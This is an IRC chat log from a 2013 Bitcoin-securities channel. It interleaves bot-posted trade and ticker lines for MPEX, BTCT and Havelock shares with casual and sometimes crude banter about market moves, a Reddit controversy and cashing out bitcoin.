2,617.85 BTC), 7D: 0.00064676 / 0.00067984 / 0.0007 (17598878 shares, 11,964.57 BTC), 30D: 0.00059445 / 0.00066287 / 0.0007 (64477504 shares, 42,740.59 BTC) Feb 07 02:36:11 [MPEX] [S.MPOE] 4321 @ 0.00068643 = 2.9661 BTC [-] Feb 07 02:36:17 [MPEX] [S.MPOE] 179 @ 0.0006862 = 0.1228 BTC [-] Feb 07 02:40:15 [MPEX] [S.MPOE] 4800 @ 0.0006887 = 3.3058 BTC [+] Feb 07 02:42:07 stayed steady through your controversy Feb 07 02:42:15 your investors have faith in you MP ;) Feb 07 02:42:41 what controversy? Feb 07 02:43:05 i misused the words Feb 07 02:43:13 internet scuffle with neckbeard* Feb 07 02:43:15 internet scuffle with neckbeards* Feb 07 02:43:56 lol which one is this ? Feb 07 02:43:59 you expected these reddit hers to achieve some result? Feb 07 02:44:08 *herds Feb 07 02:44:18 jurov they'll bittip each otehr 0.02 Feb 07 02:44:26 surely that must do something. Feb 07 02:44:47 I didn't think anything. I was curious to see how the investors would react to it. Feb 07 02:44:55 oooh link me Feb 07 02:45:03 to whatever thisw new drama is Feb 07 02:45:24 http://www.reddit.com/r/Bitcoin/comments/17zmzr/wanted_to_create_an_account_on_mpex_but_30btc_for/ Feb 07 02:45:40 oh snap Feb 07 02:45:47 streisand'd Feb 07 02:46:45 it's so weird how people think. Feb 07 02:46:55 a block is 25 btc, there's 250 a day. each day. Feb 07 02:47:11 they still call you shady Feb 07 02:47:16 somehow random douche is CONVINCED that 30 btc is too much for everyone. total btc cap might as well be 35 Feb 07 02:47:38 same thing : network output is 25th. luke does 0.120 th Feb 07 02:47:43 he somehow thinks he'll kill s.dice Feb 07 02:47:59 it's like this sort of supermunchausen syndrome Feb 07 02:48:15 it's difficult for me to attribute moral things to bitcoin Feb 07 02:48:23 when in essence the blockchain is god Feb 07 02:48:48 but a simple problem of perception. a two ounce bird could not carry a one pound coconut Feb 07 02:48:50 that sorta stuff Feb 07 02:49:16 the web seems sortof clique-ish to me Feb 07 02:49:17 these guys literally go around convinced they're personally like 60-70% of reality Feb 07 02:49:18 you need significant capital to play the market on mpex these days anyways Feb 07 02:49:21 and there's 50 million of them Feb 07 02:49:25 [MPEX] [S.MPOE] 4100 @ 0.0006879 = 2.8204 BTC [-] Feb 07 02:49:52 http://i.imgur.com/YQxh2jE.jpg Feb 07 02:49:52 to much flaming on the http Feb 07 02:50:04 not enough pretty girls covered in paint Feb 07 02:50:11 who the hell cums purple Feb 07 02:50:28 thestringpuller http://polimedia.us/dtng/c/res/85.html Feb 07 02:50:32 there, knock yourself out Feb 07 02:50:35 maybe can be done with enough food paint Feb 07 02:50:48 we should try sometime Feb 07 02:51:49 [MPEX] [S.MPOE] 3121 @ 0.0006879 = 2.1469 BTC [-] Feb 07 02:51:51 [MPEX] [S.MPOE] 2517 @ 0.0006862 = 1.7272 BTC [-] Feb 07 02:51:52 [MPEX] [S.MPOE] 6762 @ 0.00068619 = 4.64 BTC [-] Feb 07 02:52:53 Lol. This is the stuff you should have a paywall on Feb 07 02:53:12 no, the best things in life are free Feb 07 02:53:53 i feel like if it didn't take an elaborate date to get laid that would be true Feb 07 02:54:17 people still date ?! Feb 07 02:54:31 [MPEX] [S.MPOE] 1650 @ 0.00068619 = 1.1322 BTC [-] Feb 07 02:54:49 eskimobob should scream now "MP is corrupting its puppets with porn!!!" Feb 07 02:55:10 so, predictions for 2 hours from now? sell out as fast? or a little slower this time? we're not that much under what the market was at before all this starte Feb 07 02:55:13 d Feb 07 02:55:41 i guess not huh Feb 07 02:56:37 i ain't no puppet Feb 07 02:56:45 i'm a real boy Feb 07 02:57:31 ;;seen smickles Feb 07 02:57:31 smickles was last seen in #bitcoin-assets 2 hours, 48 minutes, and 43 seconds ago: (lol, i even expected it to tab-complete minecraft) Feb 07 02:57:59 ofc, porn is for real boys Feb 07 03:03:40 [MPEX] [S.MPOE] 6473 @ 0.00068619 = 4.4417 BTC [-] Feb 07 03:04:19 Dear Wikipedia readers: We are the small non-profit that runs the #5 website in the world. We have only 150 staff but serve 450 million users Feb 07 03:04:32 i open wikipedia for the first time in like 3 months Feb 07 03:04:40 there's a different begging popup than last time Feb 07 03:04:46 scum of the interwebs. Feb 07 03:09:05 [BTCTC] [GSDPT] 450 @ 0.0062 = 2.79 BTC [+] Feb 07 03:10:09 [BTCTC] [BTC-TRADING-PT] 9 @ 0.127 = 1.143 BTC [-] Feb 07 03:10:23 [BTCTC] [BTC-TRADING-PT] 10 @ 0.128 = 1.28 BTC [+] Feb 07 03:10:25 [HAVELOCK] [SDICE] 10 @ 0.689 = 6.89 BTC [+] Feb 07 03:10:31 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1297 BTC [+] Feb 07 03:11:26 [MPEX] [S.MPOE] 2670 @ 0.00068619 = 1.8321 BTC [-] Feb 07 03:11:28 [MPEX] [S.MPOE] 9850 @ 0.00068149 = 6.7127 BTC [-] Feb 07 03:11:30 [MPEX] [S.MPOE] 780 @ 0.00067993 = 0.5303 BTC [-] Feb 07 03:22:46 [MPEX] [S.MPOE] 4050 @ 0.00068738 = 2.7839 BTC [+] Feb 07 03:23:51 https://bitcointalk.org/index.php?topic=141503.60 gains momentum very slowly but shows big promise Feb 07 03:24:59 Consider any or all of theymos is hit by a bus, the forum admin account is hacked, return addresses that were previously given are now compromised, the domain is seized or hacked and transferred, kalyhost is raided, mtgox decides to disappear with their money, etc. Who is the benefactor who can receive back the money; should the treasurers be able to conspire to spend to start a new forum, etc. Feb 07 03:25:36 https://bitcointalk.org/index.php?topic=141503.msg1508788#msg1508788 Feb 07 03:25:39 im with him Feb 07 03:29:00 http://www.laurenjosephsociologist.com/wp-content/uploads/2009/08/Im-With-Stupid.jpg Feb 07 03:29:25 mkay, i hope everyone who wanted btc in has had the sense to send it already, Feb 07 03:29:29 cause i'll be off nao. Feb 07 03:30:11 Python interface unloaded Feb 07 03:30:11 Tcl interface unloaded **** ENDING LOGGING AT Thu Feb 7 03:30:12 2013 **** BEGIN LOGGING AT Thu Feb 7 11:29:34 2013 Feb 07 11:29:53 goood mornin Feb 07 11:31:46 hello Feb 07 11:32:50 morning MP Feb 07 11:33:05 Hello Feb 07 11:33:54 Note to all: I just added MPEx receipt link on the MPEx pass-through contract page on BTCT.co Feb 07 11:34:02 I will make sure to keep it updated. Feb 07 11:35:56 that's a good idea. Feb 07 11:36:14 hm, so s.dice got privately dumped ? Feb 07 11:36:17 !ticker m s.dic Feb 07 11:36:18 !ticker m s.dice Feb 07 11:36:19 The round stones beneath the earth... have spoken through the fire. Feb 07 11:36:20 [MPEX:S.DICE] 1D: 0.0060539 / 0.00632396 / 0.00677999 (950650 shares, 6,011.88 BTC), 7D: 0.0042 / 0.00579402 / 0.007395 (3557832 shares, 20,614.16 BTC), 30D: 0.00085848 / 0.00530377 / 0.0075 (8622100 shares, 45,729.70 BTC) Feb 07 11:36:33 Someone dropped 700k just before evoorhees Feb 07 11:36:40 or something like that Feb 07 11:36:41 lol evil Feb 07 11:36:47 whoddunit Feb 07 11:36:56 Who knows Feb 07 11:37:10 i always miss all the drama Feb 07 11:37:13 unfair. Feb 07 11:37:26 not true u re the drama Feb 07 11:37:44 kinda why i keep missing it i guess Feb 07 11:37:47 happens right behind me Feb 07 11:37:57 It of course ate all the bids Feb 07 11:38:01 and there was a bit left Feb 07 11:38:15 no doubt someone cashing out one of the earlier slice Feb 07 11:38:31 prolly Feb 07 11:38:32 Probably someone not interested in holding S.DICE long term. Feb 07 11:38:47 That is only speculation tho Feb 07 11:38:47 maybe they figure they buy it back later Feb 07 11:38:56 or maybesomeone trying to short it Feb 07 11:39:55 was erik pisse ? Feb 07 11:39:57 d* Feb 07 11:41:11 not really Feb 07 11:41:26 He was more like oh well Feb 07 11:41:36 i was thinking yest Feb 07 11:41:37 and the slice will stay there of course Feb 07 11:41:51 in finance the advantage of announcing and the disadvantage of announcing are kinda hard to balance Feb 07 11:42:02 He found it amusing with yesterday selling so fast and today, far less. Feb 07 11:42:12 he was all "o happy days" yest after 2nd tranche, i was thinking hm, i wonder if he gets introduced to the disadvantage side too Feb 07 11:42:13 Even not at all Feb 07 11:43:26 i have .0002 btc yay Feb 07 11:43:49 okay =/ Feb 07 11:43:55 gonna rub em on my terts woooo lol Feb 07 11:44:01 We have someone really happy right there Feb 07 11:44:23 there is this utube of this guy doing that.. Feb 07 11:44:33 not with bitcoins Feb 07 11:44:36 ldo Feb 07 11:46:16 namworld what did u have for breakfast today? Feb 07 11:47:20 It's 4:47 am =/ Feb 07 11:47:30 I haven't had breakfast Feb 07 11:47:43 pretty close, whats on the menu Feb 07 11:48:14 10k btc pizza. Feb 07 11:48:25 Sleep, till 12 to 1 PM Feb 07 11:48:40 but u gotta eat ! Feb 07 11:48:49 too much pizza is bad umk Feb 07 11:48:54 truffles, maybe you should start in #bitcoin Feb 07 11:49:07 I'm used to the evening working schedule, starting work at 2-3 PM Feb 07 11:49:29 i have no schedule.. Feb 07 11:49:39 kakokrekla what do u mean Feb 07 11:50:32 I eat a hearty breakfast some people won't call a breakfast... diner and breakfast are best switched around. Feb 07 11:50:45 he means that this isn't really a socialising venue, unless you're a big time btc corp guy and we know you. Feb 07 11:51:02 pffff Feb 07 11:51:17 that's the way the cookie crumbles. Feb 07 11:51:21 that dice dump Feb 07 11:51:26 i admit that was a brilliant move Feb 07 11:51:42 I could make the 25btc back in one trade with that. looks like i missed the train Feb 07 11:51:58 nerds have nothing to say for long periods of time, dont worry kakobrekla Feb 07 11:52:05 Bowjob well it was what, 1-2k btc's worth ? Feb 07 11:52:12 of coruse 25btc is a rounding error then Feb 07 11:52:35 [MPEX] [S.MPOE] 4321 @ 0.00068106 = 2.9429 BTC [-] Feb 07 11:52:36 [MPEX] [S.MPOE] 5483 @ 0.00068102 = 3.734 BTC [-] Feb 07 11:52:44 huh. i buy at 0,55 do a strategic dump Feb 07 11:52:51 just below erik Feb 07 11:53:19 i was busy playing farcry 3 so i missed the action Feb 07 11:53:44 well, havelock got around 200k shares Feb 07 11:53:47 ^ Feb 07 11:54:22 i like how mpoe is like... 67..70..69...68...69...70...69...68..67 etc Feb 07 11:56:04 kakobrekla none is talking in #bitcoin, are you happy ! Feb 07 11:56:29 truffles -otc then. Feb 07 11:56:44 ? Feb 07 11:56:45 hey guys i've been wondering,, supose we turn out be millionaires due to bitcoin Feb 07 11:56:56 how would you report it to government Feb 07 11:57:08 Bowjob: oh, I wouldnt, I'd just buy a congress member to make it go away Feb 07 11:57:09 and would they believe your story, Feb 07 11:57:11 its cheaper Feb 07 11:57:35 unfortunately im in canada.. i dont think our government is as corrupt Feb 07 11:57:43 tho im sure there could be shills here and there Feb 07 11:57:51 [BTCTC] [S.MPOE-PT] 14 @ 0.0007 = 0.0098 BTC Feb 07 11:58:06 its just playmoney though Feb 07 11:58:11 i checked. suppose my income was 3 mil. i'd be left with 1.5 mil after taxes Feb 07 11:58:17 [MPEX] [S.MPOE] 4736 @ 0.00068102 = 3.2253 BTC [-] Feb 07 11:58:22 [MPEX] [S.MPOE] 6314 @ 0.00068101 = 4.2999 BTC [-] Feb 07 11:58:25 Bowjob: thats still not bad Feb 07 11:58:31 umm Feb 07 11:58:33 yes it is Feb 07 11:58:38 thats just 1 house in vancouver Feb 07 11:58:41 how so? you have enough money to live the rest of your life. Feb 07 11:58:43 no. Feb 07 11:58:49 not in van Feb 07 11:58:56 then move out of vancouver? Feb 07 11:59:05 sounds like a shithole anyhow if a house costs 1.5 m Feb 07 11:59:07 too comfy here, i like the restaurants Feb 07 11:59:24 learn to cook, asshole Feb 07 11:59:26 in vancouver Feb 07 11:59:34 what kind of resturants Feb 07 11:59:57 its multicultural, but we have some really great restaurants. Feb 07 12:00:04 I prefer japanese cuisine.. Feb 07 12:00:28 how would you report it to government << you mean the ones who aren't millionaires already ? Feb 07 12:00:41 other channel was discussing the merits of thai food couple days ago Feb 07 12:00:48 maybe consider thailand Feb 07 12:00:48 [BTCTC] [S.MPOE-PT] 14 @ 0.0007 = 0.0098 BTC Feb 07 12:00:50 mp, i meant. suppose we turn out to be millionairs and wanted to cash out Feb 07 12:01:09 yeah. Feb 07 12:01:13 cashing out from BTC to cad is such a pain in the ass, im just sitting this one out Feb 07 12:01:14 yeah Feb 07 12:01:19 it is ? Feb 07 12:01:22 yeah Feb 07 12:01:32 so you go to yurp, or russia, or saudi arabia, or india Feb 07 12:01:37 set up a company, cash out there. Feb 07 12:01:50 saudi arabia sounds fun Feb 07 12:01:52 then when i go back to canada? Feb 07 12:02:09 you go back as a wealthy saudi businessman Feb 07 12:02:10 [MPEX] [S.MPOE] 4321 @ 0.00068404 = 2.9557 BTC [+] Feb 07 12:02:11 what's the problem ? Feb 07 12:02:12 [MPEX] [S.MPOE] 3956 @ 0.00068421 = 2.7067 BTC [+] Feb 07 12:02:33 wealthy saudi businessman... mhm Feb 07 12:02:49 i srsly don't see the problem ? Feb 07 12:03:34 its that easy to set up a business in a new country hmm Feb 07 12:08:47 [BTCTC] [GSDPT] 1 @ 0.0061 BTC [-] Feb 07 12:10:27 [MPEX] [S.MPOE] 3268 @ 0.00068421 = 2.236 BTC [+] Feb 07 12:12:33 Use localbitcoins, bowjob Feb 07 12:12:52 Every now and then someone will want bitcoins Feb 07 12:12:56 ive actually dunnit once Feb 07 12:13:25 get people to come ring at your door and hand you some cash Feb 07 12:13:56 when btcc were 13 dollars each i sold 100 dollars worth to test it out Feb 07 12:14:10 With a bit of chance, if you do it enough, neighbors will start to think you're a dealer. Feb 07 12:14:11 [BTCTC] [GSDPT] 164 @ 0.0061 = 1.0004 BTC [-] Feb 07 12:14:12 to my excitement, i fucked up and released the btcs without getting the monies first Feb 07 12:14:22 he/she sent me an emt anyways Feb 07 12:15:40 that was nice of them Feb 07 12:21:00 [MPEX] [S.DICE] 148 @ 0.00606924 = 0.8982 BTC [-] Feb 07 12:22:28 honest of them* Feb 07 12:22:35 [BTCTC] [GSDPT] 5 @ 0.0059 = 0.0295 BTC [-] Feb 07 12:23:20 [BTCTC] [S.DICE-PT] 5 @ 0.0061 = 0.0305 BTC [-] Feb 07 12:23:22 [MPEX] [S.MPOE] 4321 @ 0.00068105 = 2.9428 BTC [-] Feb 07 12:23:28 [MPEX] [S.MPOE] 51473 @ 0.00068101 = 35.0536 BTC [-] Feb 07 12:25:11 Did someone just switch O.o Feb 07 12:25:16 Namworld lmao that will get you busted for dealing dope in about two weeks Feb 07 12:25:34 yeah, sadly it's a rare occurance. Feb 07 12:25:49 If there was more buyers and I had many weekly, maybe Feb 07 12:25:58 [05:22] <@assbot> [BTCTC] [GSDPT] 5 @ 0.0059 = 0.0295 BTC [-] Feb 07 12:25:58 [05:23] <@assbot> [BTCTC] [S.DICE-PT] 5 @ 0.0061 = 0.0305 BTC [-] Feb 07 12:26:07 So yeah, did someone just switch o.O Feb 07 12:26:21 busted? Feb 07 12:26:43 I mean, at a loss. I don't really see the point. Feb 07 12:26:57 DeaDTerra has a great track record. Feb 07 12:28:06 !ticker h s.dice Feb 07 12:28:08 You know, I've had it up to here with this Indian malarkey. Feb 07 12:28:11 !ticker h sdice Feb 07 12:28:12 [HAVELOCK:SDICE] 1D: 0.60000000 / 0.63333601 / 0.70000000 (2485 shares, 1573.83999660 BTC), 7D: 0.52100000 / 0.65982067 / 0.89000000 (6149 shares, 4057.23727865 BTC), 30D: 0.44000000 / 0.6233377 / 0.89000000 (9813 shares, 6116.81283260 BTC) Feb 07 12:28:42 If one is cheaper to buy at a certain moment, I can understand getting a bit of the two or selecting a prefered broker Feb 07 12:29:54 ? Feb 07 12:31:11 [MPEX] [S.MPOE] 7650 @ 0.00068101 = 5.2097 BTC [-] Feb 07 12:34:12 has anyone done any busking for bitcoins before? Feb 07 12:40:03 Not that I know of Feb 07 12:50:15 [MPEX] [S.MPOE] 12406 @ 0.00068101 = 8.4486 BTC [-] Feb 07 12:50:33 [HAVELOCK] [SDICE] 10 @ 0.649 = 6.49 BTC [-] Feb 07 12:51:43 2013-02-07 02:28:05 715/715 ฿0.60000000 ฿429.0000 Feb 07 12:52:16 what's that ? Feb 07 12:52:29 715 bid at havelock Feb 07 12:52:32 [HAVELOCK] [SDICE] 10 @ 0.65 = 6.5 BTC [+] Feb 07 12:53:43 a, nice Feb 07 12:54:29 [MPEX] [S.MPOE] 7600 @ 0.00068101 = 5.1757 BTC [-] Feb 07 12:56:53 [BTCTC] [SYNERGY] 4 @ 0.08 = 0.32 BTC [-] Feb 07 12:58:49 [BTCTC] [GSDPT] 8 @ 0.0061 = 0.0488 BTC [+] Feb 07 12:59:51 [BTCTC] [GSDPT] 44 @ 0.0062 = 0.2728 BTC [+] Feb 07 13:00:27 ;;ticker Feb 07 13:00:28 BTCUSD ticker | Best bid: 21.20000, Best ask: 21.26998, Bid-ask spread: 0.06998, Last trade: 21.26998, 24 hour volume: 43201.89165334, 24 hour low: 20.77002, 24 hour high: 21.43000, 24 hour vwap: 21.18182 Feb 07 13:01:31 [MPEX] [S.DICE] 694 @ 0.00606009 = 4.2057 BTC [-] Feb 07 13:01:32 [MPEX] [S.DICE] 50 @ 0.006 = 0.3 BTC [-] Feb 07 13:09:37 [MPEX] [S.MPOE] 2498 @ 0.00068421 = 1.7092 BTC [+] Feb 07 13:09:39 [MPEX] [S.MPOE] 5025 @ 0.00068504 = 3.4423 BTC [+] Feb 07 13:09:41 [MPEX] [S.MPOE] 3277 @ 0.00068566 = 2.2469 BTC [+] Feb 07 13:22:47 [MPEX] [S.MPOE] 1913 @ 0.00068101 = 1.3028 BTC [-] Feb 07 13:23:18 s.dice spreadsheet moved? Feb 07 13:23:36 aaah, just the token changes (so yeah, new file) Feb 07 13:44:28 [BTCTC] [RSM] 100 @ 0.01 = 1 BTC [-] Feb 07 13:47:04 [MPEX] [S.MPOE] 11050 @ 0.00068103 = 7.5254 BTC [+] Feb 07 13:50:46 [MPEX] [S.MPOE] 6513 @ 0.00068103 = 4.4355 BTC [+] Feb 07 13:54:16 [MPEX] [S.MPOE] 8900 @ 0.00068103 = 6.0612 BTC [+] Feb 07 13:56:31 [MPEX] [S.MPOE] 9550 @ 0.00068103 = 6.5038 BTC [+] Feb 07 14:02:11 [MPEX] [S.DICE] 500 @ 0.00590933 = 2.9547 BTC [-] Feb 07 14:02:20 [BTCTC] [GSDPT] 995 @ 0.0059 = 5.8705 BTC [-] Feb 07 14:02:22 [BTCTC] [GSDPT] 50 @ 0.0059 = 0.295 BTC [-] Feb 07 14:02:24 [BTCTC] [GSDPT] 1000 @ 0.0058 = 5.8 BTC [-] Feb 07 14:02:26 [BTCTC] [GSDPT] 955 @ 0.0058 = 5.539 BTC [-] Feb 07 14:12:48 [MPEX] [S.MPOE] 9050 @ 0.00068103 = 6.1633 BTC [+] Feb 07 14:24:30 [BTCTC] [S.MPOE-PT] 30 @ 0.0007 = 0.021 BTC Feb 07 14:25:13 [MPEX] [S.MPOE] 4150 @ 0.00068141 = 2.8279 BTC [+] Feb 07 14:25:14 [MPEX] [S.MPOE] 1044 @ 0.00068305 = 0.7131 BTC [+] Feb 07 14:25:16 [MPEX] [S.MPOE] 4306 @ 0.00068306 = 2.9413 BTC [+] Feb 07 14:27:31 [MPEX] [S.MPOE] 4321 @ 0.00068106 = 2.9429 BTC [-] Feb 07 14:27:34 [MPEX] [S.MPOE] 3129 @ 0.00068103 = 2.1309 BTC [-] Feb 07 14:33:51 [MPEX] [S.MPOE] 16800 @ 0.00068103 = 11.4413 BTC [-] Feb 07 14:37:33 [HAVELOCK] [SDICE] 10 @ 0.63 = 6.3 BTC [-] Feb 07 14:38:56 [BTCTC] [GSDPT] 50 @ 0.0061 = 0.305 BTC [+] Feb 07 14:40:18 [BTCTC] [GSDPT] 1250 @ 0.0062 = 7.75 BTC [+] Feb 07 14:42:34 [HAVELOCK] [SDICE] 3 @ 0.63 = 1.89 BTC [-] Feb 07 14:45:33 [HAVELOCK] [SDICE] 2 @ 0.63 = 1.26 BTC [-] Feb 07 14:52:44 [MPEX] [S.MPOE] 10008 @ 0.00068103 = 6.8157 BTC [-] Feb 07 14:52:52 [MPEX] [S.MPOE] 17863 @ 0.00068102 = 12.1651 BTC [-] Feb 07 14:56:55 [MPEX] [S.BBET] 1000 @ 0.0011001 = 1.1001 BTC [-] Feb 07 14:56:57 [MPEX] [S.BBET] 500 @ 0.0011 = 0.55 BTC [-] Feb 07 14:56:59 [MPEX] [S.BBET] 5000 @ 0.001001 = 5.005 BTC [-] Feb 07 14:57:01 [MPEX] [S.BBET] 1000 @ 0.001 = 1 BTC [-] Feb 07 14:59:00 [MPEX] [S.MPOE] 494 @ 0.00068306 = 0.3374 BTC [+] Feb 07 14:59:04 [MPEX] [S.MPOE] 3653 @ 0.00068333 = 2.4962 BTC [+] Feb 07 14:59:06 [MPEX] [S.MPOE] 1353 @ 0.00068442 = 0.926 BTC [+] Feb 07 15:01:27 [MPEX] [S.BBET] 10000 @ 0.00083001 = 8.3001 BTC [-] Feb 07 15:03:54 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1387 BTC [+] Feb 07 15:06:17 [MPEX] [S.BBET] 1500 @ 0.0003 = 0.45 BTC [-] Feb 07 15:08:34 bet kakokbrekla is happy now Feb 07 15:12:55 [BTCTC] [BASIC-MINING] 2 @ 0.349 = 0.698 BTC [-] Feb 07 15:19:28 i don't think these were original bbet IPO shares Feb 07 15:20:40 https fixe Feb 07 15:20:41 d Feb 07 15:26:20 [MPEX] [S.DICE] 340 @ 0.00590933 = 2.0092 BTC [-] Feb 07 15:28:15 Im still fucking pissed off Feb 07 15:28:51 I wonder if anyone has avalons they dont want Feb 07 15:28:54 from batch 1 Feb 07 15:29:04 yeah Feb 07 15:29:14 lots of people Feb 07 15:29:18 in about 6 months Feb 07 15:29:22 [MPEX] [S.MPOE] 20550 @ 0.00068102 = 13.995 BTC [-] Feb 07 15:29:24 Bugpowder: heh Feb 07 15:29:25 will have some they don't want anymore Feb 07 15:29:34 I guess I could pick them up cheap then =/ Feb 07 15:29:57 [MPEX] [S.MPOE] 2127 @ 0.00068233 = 1.4513 BTC [+] Feb 07 15:29:59 this pisses me off Feb 07 15:30:05 yeah i plan to pick some up when buyers' credit card bills come in Feb 07 15:30:08 I have the fucking money, why do they refuse to do business Feb 07 15:33:16 [MPEX] [S.MPOE] 5805 @ 0.00068443 = 3.9731 BTC [+] Feb 07 15:43:04 I just sat in #bitcon-assets for 5 minutes. it was quiet in there... :/ Feb 07 15:43:29 then I was in bicoin-assets for 2 minutes. i should probably setup my config. Feb 07 15:43:58 lol, is there so many people like here? Feb 07 15:44:09 or you don't see the list by default? Feb 07 15:45:30 is bitcon assets for the scam offerings? Feb 07 15:45:39 seems like it should be packed Feb 07 15:46:26 then it definitely wouldn't be quiet there when someone new arrives :D Feb 07 15:46:44 seems like the snobby crowd hangs here Feb 07 15:47:30 [MPEX] [S.MPOE] 5400 @ 0.00068438 = 3.6957 BTC [-] Feb 07 15:48:07 truffles: didn't we earn the right to be a bit smug? Feb 07 15:48:20 [MPEX] [S.MPOE] 3750 @ 0.00068438 = 2.5664 BTC [-] Feb 07 15:48:23 if u think so Feb 07 15:48:42 [MPEX] [S.DICE] 48 @ 0.00590933 = 0.2836 BTC [-] Feb 07 15:48:55 I EARNED IT. Feb 07 15:48:56 http://imgur.com/a/EsExY Feb 07 15:49:04 :-P Feb 07 15:49:23 ^ DeadWeasel that's the curves i mentioned yest Feb 07 15:50:08 thx Feb 07 15:51:57 BTC shooting up to the moon? Feb 07 15:52:19 [MPEX] [S.MPOE] 656 @ 0.00068438 = 0.449 BTC [-] Feb 07 15:52:21 [MPEX] [S.MPOE] 11587 @ 0.00068102 = 7.891 BTC [-] Feb 07 15:52:23 [MPEX] [S.MPOE] 4188 @ 0.0006809 = 2.8516 BTC [-] Feb 07 15:52:23 [MPEX] [S.MPOE] 119 @ 0.00068072 = 0.081 BTC [-] Feb 07 15:54:13 [BTCTC] [BTC-MINING] 6 @ 0.06 = 0.36 BTC [-] Feb 07 15:54:13 [MPEX] [S.MPOE] 1581 @ 0.00068072 = 1.0762 BTC [-] Feb 07 15:54:14 [MPEX] [S.MPOE] 10169 @ 0.00068062 = 6.9212 BTC [-] Feb 07 15:54:39 [BTCTC] [BTC-MINING] 5 @ 0.05 = 0.25 BTC [-] Feb 07 16:00:20 [MPEX] [S.MPOE] 2400 @ 0.00068062 = 1.6335 BTC [-] Feb 07 16:01:55 Bowjob not yet, why? Feb 07 16:02:42 just a feeling. I saw 21.63 flash on gox Feb 07 16:03:05 i hope it doesnt shoot up too much, or dice may lose value Feb 07 16:03:35 so far what i've seen mpoe is being cashed out first when btc goes up Feb 07 16:03:37 niot dice Feb 07 16:03:41 *not Feb 07 16:04:01 but these new investors may behave differently Feb 07 16:06:32 [MPEX] [S.MPOE] 781 @ 0.00068062 = 0.5316 BTC [-] Feb 07 16:06:34 [MPEX] [S.MPOE] 6678 @ 0.00067971 = 4.5391 BTC [-] Feb 07 16:06:37 [MPEX] [S.MPOE] 15000 @ 0.00067932 = 10.1898 BTC [-] Feb 07 16:06:38 [MPEX] [S.MPOE] 929 @ 0.00067925 = 0.631 BTC [-] Feb 07 16:07:16 21.63 was a bad print Feb 07 16:08:18 Dice is in trouble IMHO Feb 07 16:08:48 I'll let others try to figure out why Feb 07 16:18:31 [MPEX] [S.MPOE] 6800 @ 0.00068026 = 4.6258 BTC [+] Feb 07 16:18:33 [MPEX] [S.MPOE] 2172 @ 0.00067925 = 1.4753 BTC [-] Feb 07 16:18:34 [MPEX] [S.MPOE] 4321 @ 0.00067922 = 2.9349 BTC [-] Feb 07 16:18:35 well i dont see why the usd price matters Feb 07 16:18:36 [MPEX] [S.MPOE] 3107 @ 0.00067922 = 2.1103 BTC [-] Feb 07 16:19:19 ;;ticker Feb 07 16:19:21 BTCUSD ticker | Best bid: 21.27101, Best ask: 21.40999, Bid-ask spread: 0.13898, Last trade: 21.41998, 24 hour volume: 39902.02492274, 24 hour low: 20.77002, 24 hour high: 21.43999, 24 hour vwap: 21.19806 Feb 07 16:20:54 [MPEX] [S.DICE] 697 @ 0.00590933 = 4.1188 BTC [-] Feb 07 16:20:56 how do I get the ticker for sdice> i'll do it in a private window... :) Feb 07 16:21:07 !ticker m s.dice Feb 07 16:21:08 [MPEX:S.DICE] 1D: 0.00590933 / 0.00633176 / 0.00677999 (889490 shares, 5,632.04 BTC), 7D: 0.0042 / 0.00579156 / 0.007395 (3554009 shares, 20,583.27 BTC), 30D: 0.00085848 / 0.00530707 / 0.0075 (8584308 shares, 45,557.53 BTC) Feb 07 16:21:22 thx pigeons Feb 07 16:21:30 m for mpex Feb 07 16:21:37 !ticker have sdice Feb 07 16:21:38 [HAVELOCK:SDICE] 1D: 0.60000000 / 0.63230194 / 0.68999980 (2474 shares, 1564.31499660 BTC), 7D: 0.52100000 / 0.65971495 / 0.89000000 (6184 shares, 4079.67727865 BTC), 30D: 0.44000000 / 0.62678441 / 0.89000000 (9621 shares, 6030.29283260 BTC) Feb 07 16:22:13 !ticker amuse me Feb 07 16:22:13 Shit. You ain't even old enough to smoke. Feb 07 16:22:43 thx jurov Feb 07 16:24:00 bitfunder G.SDICE 24h volume is 296BTC Feb 07 16:24:25 ;;ticker btct S.DICE-PT Feb 07 16:24:26 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Feb 07 16:24:38 ;;ticker btctc S.DICE-PT Feb 07 16:24:41 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Feb 07 16:24:51 !ticker btctc S.DICE-PT Feb 07 16:24:53 [BTCT:S.DICE-PT] 1D: 0.0061 / 0.0062 / 0.0062 (2600 shares, 16.1 BTC), 7D: 0.0061 / 0.01 / 0.0062 (4600 shares, 28.5 BTC), 30D: 0.0061 / 0.01 / 0.0062 (4600 shares, 28.5 BTC) Feb 07 16:25:01 oh my Feb 07 16:25:04 [MPEX] [S.MPOE] 4321 @ 0.00067924 = 2.935 BTC [+] Feb 07 16:25:12 [MPEX] [S.MPOE] 11479 @ 0.00067922 = 7.7968 BTC [-] Feb 07 16:25:15 !ticker btctc gsdpt Feb 07 16:25:16 [BTCT:GSDPT] 1D: 0.0058 / 0.0062 / 0.0062 (30906 shares, 190.1 BTC), 7D: 0.0045 / 0.01 / 0.0082 (120487 shares, 770.8 BTC), 30D: 0.0042 / 0.01 / 0.0082 (151620 shares, 954.2 BTC) Feb 07 16:25:45 !ticker btctc bitvps Feb 07 16:25:47 [BTCT:BITVPS] 1D: -- / -- / -- (0 shares, 0 BTC), 7D: -- / 0.0 / -- (0 shares, 0 BTC), 30D: -- / 0.0 / -- (0 shares, 0 BTC) Feb 07 16:26:01 lol they really threw it into shitter Feb 07 16:26:12 they did. Feb 07 16:26:54 Think it will rebound? Feb 07 16:27:54 only if they start paying divs Feb 07 16:29:22 [MPEX] [S.MPOE] 29200 @ 0.00067922 = 19.8332 BTC [-] Feb 07 16:30:23 oh oh not so quick Feb 07 16:31:51 [MPEX] [S.MPOE] 3395 @ 0.00068443 = 2.3236 BTC [+] Feb 07 16:31:54 [MPEX] [S.MPOE] 2968 @ 0.00068566 = 2.035 BTC [+] Feb 07 16:31:56 [MPEX] [S.MPOE] 7837 @ 0.00068567 = 5.3736 BTC [+] Feb 07 16:37:37 